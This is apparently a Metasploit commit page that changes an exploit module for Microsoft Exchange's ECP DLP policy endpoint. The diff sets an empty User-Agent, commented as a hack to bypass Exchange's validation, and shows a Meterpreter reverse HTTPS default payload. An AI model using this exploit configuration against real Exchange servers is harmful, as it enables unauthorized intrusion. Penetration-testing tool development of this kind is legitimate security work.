Make User-Agent consistent across requests

rapid7 · Sep 16, 2020 · adee1a7 · adee1a7
1 parent e118ff1
commit adee1a7
Showing 1 changed file with 4 additions and 2 deletions.
diff --git a/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb b/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
@@ -55,6 +55,7 @@ def initialize(info = {})
  'DefaultOptions' => {
  'SSL' => true,
  'PAYLOAD' => 'windows/x64/meterpreter/reverse_https',
+ 'HttpUserAgent' => '', # HACK: Bypass Exchange's User-Agent validation
  'HttpClientTimeout' => 5,
  'WfsDelay' => 10
  },
@@ -77,6 +78,9 @@ def initialize(info = {})
  OptString.new('USERNAME', [false, 'OWA username']),
  OptString.new('PASSWORD', [false, 'OWA password'])
  ])
+
+ # Deregister HttpUserAgent so it isn't exposed to the user
+ deregister_options('HttpUserAgent')
  end
 
  def post_auth?
@@ -157,7 +161,6 @@ def retrieve_viewstate
  res = send_request_cgi(
  'method' => 'GET',
  'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'),
- 'agent' => '', # HACK: Bypass Exchange's User-Agent validation
  'keep_cookies' => true
  )
 
@@ -201,7 +204,6 @@ def create_dlp_policy(viewstate)
  send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'),
- 'agent' => '', # HACK: Bypass Exchange's User-Agent validation
  'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
  'data' => form_data.to_s
  }, 0)